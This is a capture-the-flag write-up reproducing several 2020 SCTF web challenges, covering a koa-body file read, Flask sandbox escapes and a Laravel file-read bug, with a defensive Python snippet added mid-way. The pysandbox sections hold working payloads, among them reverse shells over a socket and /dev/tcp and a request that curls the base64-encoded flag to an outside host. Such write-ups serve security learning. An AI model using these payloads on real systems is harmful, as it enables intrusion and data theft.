2020 SCTF Web Challenge Reproductions

Reproducing several of the SCTF Web challenges.

0x01 CloudDisk

https://github.com/dlau/koa-body/issues/75

{"files":{"file":{"name":"aaa","path":"/proc/self/cwd/flag"}}}
{"files":{"file":{"name":"aaa","path":"/app/flag"}}}

0x02 pysandbox

W&M

Use request.args, request.method, and a modified static_folder.

Background:

  • Flask directory structure

    /app.py

    /templates

      /index.html

    /static

      /style.css

    Setting app.static_folder=// makes / the static directory.

  • request.method POST

  • request.args POST=/


Visit /static/flag.


Another method

Use app.root_path[:1] to obtain /.


0x03 pysandbox2

Nepnep

Background:

The builtins module provides direct access to all of Python's "built-in" identifiers and contains Python's built-in functions. As an implementation detail, most modules expose the name __builtins__ as part of their globals. The value of __builtins__ is normally either this module itself or the module's __dict__ attribute. This is used a lot in SSTI.

ord() can be overridden with __builtins__.__dict__['ord']=lambda args:42.

lambda arguments : expression

lambda*args:expression

After that, the security check can be bypassed.

Then arbitrary code can be executed.

__builtins__.ord=lambda*args:42

__import__("os").popen("curl ip:8888")

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

There is another method, which echoes the result back:

app.view_functions['security']=lambda: __import__('os').popen('id').read()

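A defender-side illustration of the ord() rewrite above, added here and not part of the original writeup: the same character filter written two ways (one that resolves ord through builtins at call time, one that binds the genuine builtin at definition time), plus an integrity check that reports which builtins entries have been replaced. The deny-list, the sample payload and all function names are constructed for this example.

```python
import builtins

# Constructed deny-list standing in for the challenge's real filter: code points
# of characters such a sandbox refuses. Computed once, before any user code runs.
BLOCKED_CODES = {ord(c) for c in "_'\"[]"}

def naive_security(code: str) -> bool:
    """Filter written the way the writeup describes it: `ord` is looked up
    through builtins at call time, so rewriting __builtins__.ord disables it."""
    return all(ord(ch) not in BLOCKED_CODES for ch in code)

def hardened_security(code: str, _ord=builtins.ord) -> bool:
    """Same filter, but the genuine builtin is bound as a default argument when
    the function is defined, so a later reassignment of builtins.ord is not seen."""
    return all(_ord(ch) not in BLOCKED_CODES for ch in code)

# Snapshot of every builtins entry taken at import time, for integrity checking.
_ORIGINAL_BUILTINS = {name: getattr(builtins, name) for name in dir(builtins)}

def tampered_builtins() -> list:
    """Return builtins names whose object is no longer the one captured at import."""
    return sorted(name for name, obj in _ORIGINAL_BUILTINS.items()
                  if getattr(builtins, name, None) is not obj)

def demo() -> dict:
    """Run both filters before and after the `ord` rewrite from the writeup and
    report what the integrity check flags. Builtins are restored afterwards."""
    payload = "__import__('os')"  # constructed sample; contains blocked characters
    before = (naive_security(payload), hardened_security(payload))
    saved = builtins.ord
    builtins.ord = lambda *args: 42  # the same effect as __builtins__.ord=lambda*args:42
    try:
        after = (naive_security(payload), hardened_security(payload))
        flagged = tampered_builtins()
    finally:
        builtins.ord = saved  # undo the tamper so the rest of the process is unaffected
    return {"before": before, "after": after, "flagged": flagged}

if __name__ == "__main__":
    print(demo())  # {'before': (False, False), 'after': (True, False), 'flagged': ['ord']}
```

Binding the builtin at definition time only protects this one function; the integrity snapshot is what tells you the interpreter has already been tampered with, which in a shared process is the signal that matters.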

L-team

import requests 
print(requests.post('http://39.104.90.30:10005', data={
'cmd':
'Flask.__doc__=request.form[secret[0]];'
'app.make_response=lambda*p:Flask.__doc__;'
'app.process_response=exec',
'F': "__import__('os').system(\"bash -c 'bash -i >& /dev/tcp/my_ip/23333 0>&1'\")" }))

oxcccccc

POST /?a=__import__('os').system('curl+http%3a//ccreater.top%3a60000/+-d+`cat+flag|base64`') HTTP/1.1
Host: 39.104.90.30:10006
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: http://39.104.90.30:10006/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx3B8HB5b
Content-Length: 248

------WebKitFormBoundaryx3B8HB5b
Content-Disposition: form-data; name="cmd"

request.args.__class__.__getattr__=request.args.__class__.__getitem__;app.config.__class__.__eq__=eval;app.config==request.args.a;
------WebKitFormBoundaryx3B8HB5b--

__getattr__:

__getitem__:

__eq__:

0x04 bestlanguage

Routes:

#routes/web.php

Route::get('/',"IndexController@init");
Route::post('/rm',"IndexController@rm");
Route::get('/tmp/{filename}', function ($filename) {
    readfile("/var/tmp/".$filename);
})->where('filename', '(.*)');
Route::post('/upload',"IndexController@upload");
Route::get('/move/log/{filename}', 'IndexController@moveLog')->where('filename', '(.*)');
#\App\Http\Controllers\IndexController.php
<?php

namespace App\Http\Controllers;

class IndexController extends Controller
{
    public function init(){
        if($_SERVER["REMOTE_ADDR"] !== "127.0.0.1" && strpos($_SERVER["REMOTE_ADDR"],"192.168.") !== 0 && strpos($_SERVER["REMOTE_ADDR"],"10.") !== 0 ) {
            die("admin only");
        }
        if(!file_exists("/var/tmp/".md5($_SERVER["REMOTE_ADDR"]))){
            mkdir("/var/tmp/".md5($_SERVER["REMOTE_ADDR"]));
        }
    }

    public function rm(){
        if(strpos($_POST["filename"], '../') !== false) die("???");
        if(file_exists("/var/".$_POST["filename"])){
            if(is_dir("/var/".$_POST["filename"])){
                rmdir("/var/".$_POST["filename"]);
                echo "rmdir";
            }
            else{
                unlink("/var/".$_POST["filename"]);
                echo "unlink";
            }
        }
    }

    public function upload()
    {
        if(strpos($_POST["filename"], '../') !== false) die("???");
        file_put_contents("/var/tmp/".md5($_SERVER["REMOTE_ADDR"])."/".$_POST["filename"],base64_decode($_POST["content"]));
        echo "/var/tmp/".md5($_SERVER["REMOTE_ADDR"])."/".$_POST["filename"];
    }

    public function moveLog($filename)
    {
        $data = date("Y-m-d");
        if(!file_exists(storage_path("logs")."/".$data)){
            mkdir(storage_path("logs")."/".$data);
        }
        $opts = array(
            'http'=>array(
                'method'=>"GET",
                'timeout'=>1, // in seconds
            )
        );

        $content = file_get_contents("http://127.0.0.1/tmp/".md5('127.0.0.1')."/".$filename,false,stream_context_create($opts));
        file_put_contents(storage_path("logs")."/".$data."/".$filename,$content);
        echo storage_path("logs")."/".$data."/".$filename;
    }
}

Arbitrary file read; here index.php must be included in the path, otherwise it does not succeed.


0x05 Login Me

[screenshot]

0x06 Login Me Again

[screenshot]